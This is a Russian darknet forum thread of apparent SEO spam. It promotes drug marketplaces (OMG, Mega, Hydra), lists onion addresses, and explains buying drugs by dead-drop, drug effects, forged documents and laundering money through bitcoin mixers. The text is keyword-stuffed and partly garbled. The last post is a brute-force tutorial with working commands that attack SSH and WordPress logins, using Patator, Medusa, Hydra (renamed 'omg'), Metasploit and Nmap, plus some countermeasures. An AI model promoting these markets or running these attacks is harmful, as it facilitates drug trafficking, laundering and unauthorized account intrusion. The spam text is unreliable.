Ссылка на матангу для торта

Koradisu

Модератор
Подтвержденный
Сообщения
545
Реакции
38
Уважаемые пользователи RuTOR , Все сайты из нашего списка проверены и находятся онлайн, их нет в скам листах. Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки. Подборка официальных сайтов по продаже веществ от форума Rutor носит исключительно информативный характер.

1. OMG!OMG - MOST ADVANCED DARKMARKET

Эта площадка существует довольно давно и в этот период она медленно развивалась в тени гидры. В настоящее время это ведущий сайт по продаже веществ в даркнете.
 

 

2. MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

3. HYDRA - Возрождение легенды.

Идут работы по восстановлению всеми любимой гидры, но все не так просто как казалось ранее, совсем скоро она будет доступна, а сейчас нам остается только ждать релиза от команды HYDRA.

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.



Wodyfuga

Юзер
Сообщения
120
Реакции
18
Ссылка на матангу для торта
Главнаяomg сайт телеграммОМГ ссылка телеграм omgpchela comОМГ ссылка телеграм omgpchela com
  6912/04/2022 в22:57 ТС  Jokocyc (Поддержка)89 сделок812 лайковУважаемые пользователи, в связи с потерейдоступа к маркетплейсу с 05.04.2022 по 06.04.2022г участилисьпопадания на фишинговые сайты, адреса omg остались прежними:

http://omgclubbioknikokex7njhwuahc2l67lfiz7z36md2jvopda7nchid.onion

http://omgrusawyg5ykmsgvnyhdumzeawp465jp7zhynyihexdv5p74etnid.onion

http://omgrusoeitpwagsnukxyxkd4copuuvio52k7hd6qbabt4lxcwnbsad.onion

  2513/04/2022 в11:09 Foqoqi3 сделок96 лайкДело в том, что не так подобного типа, но оценить и своими - 110л заглавием molle. Человек под коксом. Как зайти на сайт омг стелефона? Onion При регистрации никаких личных данных указывать ненадо. Также для вас не составит труда зайти на сайт омг черезтелефон или зайти на сайт омг через комп, все очень просто,достаточно воспользоваться официальным.Onion и безопасно зайти на сайт omg. ОМГ сайт википедияomg супермаркет моментальных товаров. Если веб- сайт выглядитнекорректно или не работает так, как он должен работать. Гидру -новая ссылка гидры бот омг, tor omg, omg omg2support.Первое что вам нужно это скачать сам тор onion. Категория: ОМГссылка телеграмм зеркала закладки omg4supports com. Отангл. Как зайти на гидру с телефона.  2313/04/2022 в21:19 Hakipesu4 сделок61 лайкинтересное и «запрещенное многие думают просайт omg Onion, который на фоне других сайтов, является самымнадежным партнером Перейти. Узнай как зайти на гидру, а такжепополнить баланс для покупок в магазине omg onion. По своемуфункционалу и качеству абсолютно не уступает конкурентам. Re: новыйсайт гидры onion omgpchela com. Купить кокаин на гидре. Естьнесколько главных различий, в сравнении с другими сайтами,благодаря которым покупатели выбирают именно Гидру; Отсутствуюткритичные уязвимости в безопасности (по заявлению администрацииторговой площадки Гидрв Вы можете завести собственныйбиткоин-кошелек, а также есть обменник биткоина (qiwi/bank/sim вbitcoin Сайт обладает самой современной системой анонимности.Зеркало 2021. От.10. В сплаве и, что не так издавна удалось воочию.Новое зеркало omg union без VPN и TOR. Ссылки на Годнотабавозможность перейти на самые популярные ресурсы, с помощью которыхможно получить запрещенные. В Москве арестовали сооснователядаркнет -маркетплейса «ОМГ». По последним данным, производством исбытом наркотиков. Тор браузер омг : омг онион Рабочее зеркалогидры. Найти ссылку на реальный телеграм-канал Гидры можно справа всамом низу сайта (смотрите на скриншот ниже). Актуальный вход нагидру в анион сети. Покупка передается в виде клада.  2414/04/2022 в12:34 JujunerJU17 сделок32 лайкОМГ телеграм сайт. Как зайти на гидру ссылкаomgpchela com.  2415/04/2022 в03:49 HudaheHU7 сделок32 лайкОфициальный сайт omg Onion. Проверенныемагазины наркотиков в телеграмме. Персональные сведения юзеровисключительно в кодированном виде в облачном.  315/04/2022 в16:01 OzitotyxOZ10 сделок78 лайкСписок ссылок на гидру. Биткоин-миксеры 2021рейтинг ТОП-7 by hidden в как найти BTC-миксер с маленькимикомииссиями? omg onion омг вход : омг сайт. omg Onion(маркетплейс ОМГ онион) уникальная торговая площадка в сети. Посведениям СМИ, речь идет об одном.  3115/04/2022 в22:07 Bysowany7 сделок80 лайкПортативный пакет Tor Browser с веб-браузеромFirefox позволяет использовать анонимайзер Tor на Windows, MacOS иLinux без установки дополнительного ПО для обеспечение анонимности,безопасности и приватности в Интернете. Новое зеркало гидры.  2016/04/2022 в13:22 PiwozykPI20 сделок61 лайкРегистрация на сайте омг 2022. Ссылка НАфорум omg ссылка на сайт omgruzxpnew8onion com, omg магазин.Кто-то устал сопротивляться и перешел "под крыло» Гидры, кто-топродал компании свои активы, а кто-то попросту «сдулся» и осталсяни с чем. Контактный номер Вакансия: - 18,30 по Ольга Горенко,.ОМГ ссылка Воспользоваться торговой площадкой omg onionнепросто.

Покупателямomg darknet ссылка Тор омг андроид как зайти на сайт ОМГ официальный сайт зеркало omgruzxpnew4af onion omg адрес тор omg24 biz
Наркологическая служба@health_with_help_bot
МагазинамОМГрф сайт omg ссылка зеркало omgpchela com Зеркало на июль 2021 омг ОМГ зеркало ссылка тор omg4jpwhfx4mstonion com Как найти правильную ссылку на omg ВходИнформацияСайты зеркала гидры Ссылка на адрес гидры Скопировать ссылку гидры omg ssylka onion com ОМГ сайт зеркало omg9webe Сайт омг магазины РегистрацияЮридическая службаСсылки на онион сайты
ОбучениеUnion омг сайт omgbestmarket com ОМГ сайт ссылка omg4webes Официальный сайт омг ссылка тор omg4jpwhfx4mstonioncomCopyright © 2015-2022 omg. Все права защищены
 

Erabipuz

Юзер
Сообщения
60
Реакции
21
не страшны из-за большого опыта на рынке даркнета и опыта нашей команда, но некоторые иногда пробиваются нашу защиту и в такие моменты нам требуется время на восстановление, когда такое происходит и вы не можете войти на свою привычную ссылку омг, мы хотим чтобы вы были осведомлены и добавили данную статью себе в закладки чтобы иметь запасной способ как попасть на сайт омг, если какие-то из зеркал находятся в ауте, официальный список наших зеркал и ссылок на сайт омг:Также предоставляем вашему вниманию ссылки на онион гидру, если вы наш старый пользователь, то вы знаете что на онион ссылки омг можно попасть только через определенный браузер - Tor браузер, поэтому если вы новый пользователь, то обязательно скачайте Тор браузер, используя его вы делаете своё пребывание в сети намного безопаснее, ссылки на омг онион:
Теги:омг, омг сайт, рабочее зеркало омг, омг ссылка, как зайти на гидру, омг маркет, омг магазинспособ обходаобход блокировкитор омгомг анионрабочая омгомг сайт в тор браузереомг правильная ссылкаПомощь пользователю и статьи по сайту ОМГМы предлагаем вам окунуться в мир даркнета и посетить проверенный временем и испытаниями, самый крупный магазин запрещенки ОМГ маркет, мы довели покупки на нем до полного автоматизма и безопасности, так как при покупки чего-либо в магазине омг, деньги которые вы перечислили за товар не дойдут до продавца пока покупатель не подтвердит получение товара, то есть в случае ненахода вы можете обсудить вопрос с продавцом и в итоге он обязан сделать перезаклад или деньги вам вернуться, если не удается решить вопрос с продавцом, то смело зовите модератора сайта омг в беседу и он обязательно разрешит ваш конфликт. Как уже упоминалось, все сделки в магазине омг происходят автономно и вам не нужно ждать когда продавец будет онлайн, это очень удобно. Перед первой покупкой на сайте вам необходимо создать аккаунт путем краткой регистрации на сайте, после чего вам необходимо пополнить личный счет на сайте, а именно приобрести биткоин и приступать непосредственно к покупкам, намного подробнее вы сможете узнать об этом в данном мануале ссылка на мануал. На сайте омг полным-полно различных мануалов по сайту омг полный список вы можете увидеть здесь: ссылка на статьи, также новости на сайте постоянно обновляются, вы можете наблюдать это тут. На сайте omg вы сможете найти ответ на любой вами заданный вопрос, мы стараемся держать вас в курсе всех новостей касающихся omg.Теги: ublhf vfufpby, ublhf ccskrf, ublhf cfqn, ublhf jybjy, ublhf cfqn d njh ,hfeptht
Ссылка на матангу для торта
 
Y

Ygewyvec

Пассажир
Сообщения
93
Реакции
17
Важные особенностиПростотаУдобный интерфейс не дает запутаться и поможет сделать пребывание на сайте удобным и простымБыстродействиеНаша платформа написана с нуля и заточена под максимальную скоростьАнонимностьПродуманная система шлюзов, мостов, onion маршрутизатора позволяет достичь наивысшую безопасность и анонимностьКак войти на сайта ОМГ маркета прямо сейчасСсылка представленная ниже в обход блокировки и анонимнаЗайти на omgКак пользоваться omg1Создайте аккаунтДля этого нужно открыть страницу регистрации, заполните обязательные поля и нажмите кнопку "зарегистрироваться"2Выбор товаровВашему вниманию представлена отличная система поиска с переходами по категориям3Пополните крипто кошелекBitcoin кошелек можно пополнить как переводом с другого кошелька, так и с помощью встроенного обменника4Оплатите и заберите товарЗайдя в необходимый товар, нажмите кнопку оплатить, вам будут отправлены данные о местоположение клада и тд5НаслаждайтесьМы надеемся на то, что наш сервис принесет вам максимальное удовольствиеFAQОстались вопросы?Как безопасно пользоваться Гидрой?Наши программисты - лучшие специалисты по кибербезопасности, самые современные технологии обеспечивают 100% анонимность и безопасность.Что делать если сайт заблокирован?Не секрет что с недавних пор правительство активно взялось за интернет и анонимность в частности, поэтому для наибольшей защиты мы создали несколько официальных зеркал нашего магазина, если какое-то зеркало не работает, пробуйте другоеКак зайти на omg онион?Для этого нужно просто перейти по официальной ссылкеЧто делать если я не получил купленный клад?Действительно из-за недопросовесных кладменов, которые занимаются поиском чужих товаров, такая ситуация возможна, после покупки вы имеете 24 часа на жалобу, в данном случае администрация omg в срочном порядке рассмотрит ваше обращение и быстро разрешит возникший спор.Что продают на гидреМарихуана (Каннабис)В зависимости от сорта (индика/сатива) вызывает разные чувства.По эффекту воздействия при курении индика и сатива различаются – если индика вызывает сонливость, снижение активности, сильное расслабление, то сатива наоборот, стимулирует всплеск сил, поднимает настроение и провоцирует на активные действия.Оба этих сорта использовались в медицинских и лекарственных целях. Сорта конопли с высоким содержанием индики преимущественно служили избавлением от бессонницы и болей, поэтому часто применяются перед сном. Семена конопли индики имеют сниженный процент содержания ТГК.Обратное действие сативы – стимулирующее и активизирующее внутренний потенциал – нашло применение при лечении стресса, депрессий, повышенной тревожности.Подробнее ПерейтиЭйфоретики (МДМА, Мефедрон)МДМА (Экстази)Эффекты MDMA начинаются через 30-60 минут после употребления, а пик наблюдается через 75-120 минут, плато длится 3,5 часа.7) Кратковременные психоактивные эффекты MDMA включают:Эйфория – ощущение чувства удовлетворения и счастьяЭйфория – ощущение чувства удовлетворения и счастьяУсиление ощущений, восприятия или сексуальностиСексуальное влечениеУсиление ощущений, восприятия или сексуальностиОщущение внутреннего умиротворенияРабочая ссылка ПерейтиМефедронМефедрон вызывает эйфорию, стимулирующий эффект, способствует более глубокому пониманию музыки, поднимает настроение, снижает враждебность, вызывает улучшение умственной деятельности и оказывает мягкую сексуальную стимуляцию; эти эффекты подобны эффектам кокаина, амфетамина и МДМА, и длятся разное количество времени, в зависимости от способа введения вещества. При пероральном приеме, покупатели сообщали о возникновении эффекта в течение 15-45 минут; при вдыхании последствия ощущались в течение нескольких минут и достигали пика в течение получаса. При приеме внутрь или через нос эффект длится от двух до трех часов.ПерейтиПсиходелики (ЛСД, грибы)ЛСДВозникает чувство того, что вся окружающая обстановка как будто «плывет и дышит», постоянно видоизменяясь. За закрытыми глазами появляются красивые сменяющиеся красочные узоры. Ощущается сильный прилив энергии, подъем настроения и повышение ассоциативного мышления.Подробнее ПерейтиГрибыГрибы повышают самосознание и чувство контакта с «Трансцендентным Другим» – добавляя более глубокое понимание нашей связи с природой. Психоделические препараты могут вызывать состояния сознания, которые имеют личный смысл и духовное значение у религиозных или обладающих духовными наклонностями людей; эти моменты называются мистическими переживаниями.Подробнее... ПерейтиВнимание!Участились случаи мошенничества, рекомендуем добавить сайт в закладки чтобы не потерять его.Добавить в закладкиgodnotaba-omg.comCopyright © 2015 — 2021. Все права защищены.
Вся информация представлена в ознакомительных целях и пропагандой не является.ОМГ онион Загрузка, ждите...
 

Afoce

Пассажир
Сообщения
112
Реакции
19
Posted on by Guillaume Saussez







omg shop – магазин моментальных покупокОМГ онион (omg onion) – это самая популярная площадка запрещенных товаров в “черной” сети (Draknet). Данный магазин в основном ведет свою деятельность в Tor browser, так как он является безопасным браузером и всвязи с тем, что товар которым торгуют на omg shop является незаконным, данный браузер идеально к нему подходит. Tor browser работает через vpn постоянно, поэтому это позволяет сохранять полную анонимность для каждого пользователя сайта омг. Также, на сайте работает двухфакторное шифрование, для тех кто не хочет разбираться с тор браузером. С обычного браузера вы тоже можете попасть и с помощью алгоритмов защиты, вы останетесь незаметным, но для полной конфиденциальности рекомендуем использовать Tor.ОМГ полностью безопасна, они тщательно относятся к конфиденциальности каждого клиента, основная проблема omg shop является то, что проблематично найти официальную ссылку сайта омг, для этого вы публикуем зеркала на сайт омг, которые мы рекомендуем вам сохранить к себе в избранное.Официальные зеркала для обычных браузеровСсылки омг онион для тор браузераМагазин моментальных покупок постоянно прогрессирует и уже сегодня омг работает по таким странам: Россия, Беларусь, Украины, Казахстана. Мы расширяемся и планируем расти дальше.Популярные города: Краснодар, Санкт-Петербург, Минск, Казань, Астрахань, Томск, Астана, Пермь, Киев, Харьков, Москва, Ростов-на-Дону, Иркутск, Тамбов, Нурсултан, Красноярск, Владивосток.Темный магазин работает по принципы автоматических продаж, вы можете приобрести то, что пожелаете в любое время суток и не нужно ждать продавца.
Есть гарант продаж, в виде того, что продавец не получить оплаченные вами средства, пока вы лично не подтвердите “наход” закладки. На omg работает техническая поддержка круглосуточно, поэтому по всем интересующим вопросам на тему Гидры, вы можете обратиться к ним. Вам обязательно помогут и в случае если у вас какие-то проблемы с “находом” или вы считаете, что вам продали товар плохого качества – напишите в тех поддержку, они решат ваш спор и предложат варианты развития данной ситуации.Первые покупки на сайте омгСайт ОМГ работает через такую валюту как – биткоин. Для того чтобы перейти к покупкам вам необходимо пройти короткую регистрацию и пополнить свой личный счет криптовалютой. Одной из особенностей является то, что переводу для гидры не требует подтверждения blockchain.В “темном магазине”, вы можете приобрести: траву, бошки, шишки, мефедрон, гашиш, амфетамин, лсд, мдма, кокс, экстази, омгпоника и многое другое. omg ещё предлагает своим клиента различные запрещенные услуги, по типу: подделка документов, взлом почты, соц. сетей и тому подобное.Также, из-за того, что мы постоянно растем, уже сегодня мы можем предложить вам уникальную возможность выбрать район в котором будет сделан клад. Вы можете использовать данную функцию в целях удобства или же наоборот, отведения внимания, заказ товар в другом районе, выбирать вам.Для пополнения личного счета аккаунта на гидре, мы рекомендуем вам использовать “чистые” криптомонеты, чтобы повысить процент анонимности и вас никто не смог отследить, мы рекомендуем сервис по очистке биткоинов, биткоин миксер – BitMix.Это популярный сервис в даркнете, у него огромный опыт работы с клиентами и большой резерв криптовалюты.Данная прачечная биткоинов, также работает в черной сети и базируется в Tor браузере, но есть ссылки и для обычных браузеров, мы с вами поделимся ссылками данного сервиса, чтобы вы смогли как следует позаботиться о своей анонимности.Для вас существует такой сайт как “Рейтинг биткоин миксеров – Топ 10 миксеры криптовалюты”, в котором расположен рейтинг всех популярных и надежных биткоин миксеров, в виде топа сервисов по очистке криптовалюты. А также отзывы и обзор биткоин миксеров, принцип их работы, их плюсы и минусыТеги: Биткоин миксер, топ биткоин миксеров, рейтинг миксеры криптовалюты, отмывка криптовалюты, очистка биткоинов, bitcoin mixer, bitcoin tumbler, bitcoin blender, clean tainted bitcoins, best bitcoin mixer, bitcoin mixing service with lowest feeОфициальный сайт омг 2021Хотим предупредить вас о том, что в сети полно фейков сайта омг, поэтому пользуйтесь только официальными ссылками на омг магазин. Также, проверяйте правильность адресов, тем более при пополнении счета. Это сегодня самый актуальный вопрос для нас, будьте осторожны.Бывает ещё так, что наши сайты недоступны и возможно находятся под атакой злоумышленников, в таком случае вы можете просто перейти на зеркало веб-сайта ОМГ.Сохраните данный список к себе в избранное и удачных покупок, проверяйте url адреса и будьте внимательнее.
 
T

Tysof

Пассажир
Сообщения
53
Реакции
19
Brute-force (атака полным перебором) – метод решения математических задач, сложность которого зависит от количества всех возможных решений. Сам же термин brute-force обычно используется в контексте хакерских атак, когда злоумышленник пытается подобрать логин/пароль к какой-либо учетной записи или сервису.Рассмотрим инструменты, которые можно использовать для выполнения brute-force атак на SSH и WEB-сервисы, доступные в Kali Linux (Patator, Medusa, omg, Metasploit), а также BurpSuite.

Все материалы, предоставленные в рамках данной статьи, предназначены для использования исключительно в учебных целях. Использование материалов в противоправных и противозаконных запрещено.

Brute-force SSH
Для примера возьмем тестовую машину 192.168.60.50 и попробуем подобрать пароль пользователя test по SSH. Мы будем использовать популярные пароли из стандартного словаря rockyou.txt.
Patator
Для подбора пароля средствами Patator используем команду:patator ssh_login host=192.168.60.50 user=test password=FILE0 0=/root/wordlist -x ignore:mesg=’Authentication failed’где:
ssh_login — необходимый модуль
host – наша цель
user – логин пользователя, к которому подбирается пароль или файл с логинами для множественного подбора
password – словарь с паролями
-x ignore:mesg=’Authentication failed’ — команда не выводить на экран строку, имеющую данное сообщение. Параметр фильтрации подбирается индивидуально.
omg
Для подбора пароля используя omg выполним команду:omg -V -f -t 4 -l test -P /root/wordlist ssh://192.168.60.50где:
-V – показывать пару логин+пароль во время перебора
-f – остановка как только будет найден пароль для указанного логина
-P – путь до словаря с паролями
ssh://192.168.60.50 – указание сервиса и IP-адрес жертвы
Medusa
Для подбора пароля с использованием Medusa выполним команду:medusa -h 192.168.60.50 -u test -P /root/wordlist -M ssh -f -v 6где:
-h – IP-адрес жертвы
-u – логин
-P – путь к словарю
-M – выбор модуля
-f – остановка после нахождения валидной пары логин/пароль
-v – настройка отображения сообщений на экране во время процесса подбора
Metasploit
Произведем поиск инструмента для проведения brute-force атаки по SSH:
search ssh_login и получили ответ:Задействуем модуль:use auxiliary/scanner/ssh/ssh_loginДля просмотра необходимых параметров, воспользуемся командой show options. Для нас это:
rhosts – IP-адрес жертвы
rport – порт
username – логин SSH
userpass_file – путь до словаря
stop_on_success – остановка, как только найдется пара логин/пароль
threads – количество потоковУказание необходимых параметров производится через команду "set".set rhosts 192.168.60.50
set username test
set userpass_file /root/wordlist
set stop_on_success yes
set threads 4
set rport 22Указав необходимые параметры набираем команду "run" и ждем.Противодействие
Ограничить количество устанавливаемых соединений с использованием межсетевого экрана. Пример настройки iptables:-A INPUT -i eth0 -p tcp --dport 22 -m connlimit --connlimit-above 1 --connlimit-mask 32 -j REJECT --reject-with tcp-reset.Такое правило установит ограничение доступа к SSH для каждого IP-адреса до 1 соединения в секунду, значительно усложнив перебор. Также эффективным решением может быть использование двухфакторной аутентификации (например, используя eToken) или аутентификации с использованием ключевой пары, а также использование ACL на основе IP-адресов.Brute-force WordPress
Рассмотрим другой пример — подбор пароля окна авторизации веб-формы.Для примера будем подбирать пароль от учетной записи администратора wordpress.
BurpSuite
Для начала нам необходимо понять, как происходит процесс авторизации. Для этого мы будем использовать BurpSuite. Нам необходимо попробовать авторизоваться с любым паролем и логином, чтобы посмотреть какие запросы проходят через BurpSuite.Отлично, мы увидели POST запрос для авторизации с ним мы и будем работать.
В BODY указано какой логин и пароль проверялись, а значит, мы можем попробовать самостоятельно подставить нужные нам значения.
Передаем этот запрос в Intruder и там выбираем необходимые параметры для атаки. В пункте Payload Positions тип атаки оставляем sniper, но для проверки оставляем только параметр pwd. Таким образом, при атаке будет изменяться только этот параметр.Загружаем необходимый словарь и начинаем атаку.Из поведения веб-приложения мы видим, что неверный пароль возвращает код ответа 200. После перебора словаря, видим, что один из паролей дал ответ с кодом 302 — он и является верным.Данный метод перебора занимает намного больше времени, чем при использовании Patator, omg, Medusa и т.д. Даже с учетом того, что мы взяли небольшой словарь, BurpSuite перебирал словарь около 40 минут.
omg
Попробуем подобрать пароль с помощью omg.
Как мы уже знаем, при неверной авторизации возвращается код 200, а при успешной – 302. Попробуем использовать эту информацию.
Для запуска используем команду:omg -V -f -l admin -P /root/wordlist -t 4 http-post-form://192.168.60.50 -m "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1:S=302"Здесь мы указываем обязательные параметры:
-l – имя пользователя
-P – словарь с паролями
-t – количество потоков
http-post-form – тип формы, у нас POST.
/wp-login.php – это URL страницы с авторизацией
^USER^ — показывает куда подставлять имя пользователя
^PASS^ — показывает куда подставлять пароль из словаря
S=302 – указание на какой ответ опираться omg. В нашем случае, ответ 302 при успешной авторизации.
Patator
Как мы уже знаем, при неудачной авторизации возвращается код 200, а при удачной – 302. Будем использовать тот же принцип, что и с omg:
Запуск производится командой:patator http_fuzz url=http://192.168.60.50/wp-login.php method=POST body='log=admin&pwd=FILE0&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1' 0=/root/wordlist -t 4 before_urls=http://192.168.60.50/wp-login.php -x ignore:code=200 accept_cookie=1http_fuzz – модуль для brute-force атаки http
url – адрес страницы с авторизацией
FILE0 — путь до словаря с паролями
body – информация, которая передается в POST запросе при авторизации
-t — количество потоков
-x – В данном случае мы указали команду не выводить на экран сообщения строки, содержащие параметр с кодом 200
accept_cookie – сохранение параметра cookie и передачи его в следующий запрос
Как итог – нам удалось подобрать пароль.
Nmap
Утилита Nmap позволяет в том числе производить подбор паролей для веб-форм авторизации, если использовать скрипт http-wordpress-brute с соответствующими аргументами:
--script-args – добавление аргументов
user или userdb – логин или файла с логинами
pass или passdb — указание пароля или словаря
thread – количество потоков
firstonly=true – выводить результат после первого же правильного пароляnmap 192.168.60.50 --script http-wordpress-brute --script-args 'user= admin,passdb= /root/wordlist, http-wordpress-brute.thread=3, brute.firstonly=true'Противодействие
Ограничить (усложнить) brute-force атаки на web-приложения можно средствами iptables (по аналогии с SSH) и средствами nginx. Для этого необходимо создать зону лимитов:
...
limit_req_zone $binary_remote_addr zone=req_limits:10m rate=30r/s;
...

и задействовать ее:
location / {
...
limit_req zone=req_limits burst=10;
limit_req_status 429;
...
}

Такие настройки позволят ограничить количество запросов с одного IP-адреса до 40 в секунду.Усложнить задачу перебора можно используя следующие методы:
— Применение межсетевого экрана и прочего ПО для ограничения количества обращений к защищаемому сервису. О том, как мы используем машинное обучение для выявления подобных атак (в том числе распределенных), можно почитать в статье.
— Использование средств, препятствующих быстрой проверке корректности ключа (например, Captcha).Заключение
В данной статье мы поверхностно рассмотрели некоторые популярные инструменты. Сократить риск подбора пароля можно, следуя следующим рекомендациям:
— используйте устойчивые к подбору пароли;
— не создавайте пароли, используя личную информацию, например: дату рождения или имя + дата рождения или мобильный телефон;
— регулярно меняйте пароль;
— на всех аккаунтах применяйте уникальные пароли.Подобные рекомендации (как и рекомендации по безопасной веб-разработке) мало кто соблюдает, поэтому необходимо использовать различные программные решения, позволяющие:
— ограничить подключение по IP-адресу, или, если это невозможно, ограничить одновременное количество соединений с сервисом (средствами iptables, nginx и прочими);
— использовать двухфакторную аутентификацию;
— выявлять и блокировать подобные атаки средствами SIEM, WAF или другими (например, fail2ban).
 
Сверху Снизу